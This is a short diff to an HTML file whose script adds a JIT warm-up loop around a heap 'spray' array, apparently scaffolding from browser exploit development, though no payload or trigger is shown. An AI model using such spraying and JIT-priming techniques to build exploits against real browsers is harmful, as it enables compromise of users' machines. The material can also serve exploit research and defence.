--- a/array.html
+++ b/array.html
@@ -1,5 +1,5 @@
 <script>	
-alert("start7");
+alert("start57");
 function func2(){
 for(var i=0;i<0x1000;i++){ 
 
@@ -8,6 +8,9 @@ for(var i=0;i<0x1000;i++){
 
  function func(){
   return 1
+ }
+ for (var i=0; i<0x1000; i++) {
+  func()
  }
 var spray=new Array(0x800);
 var tmp;
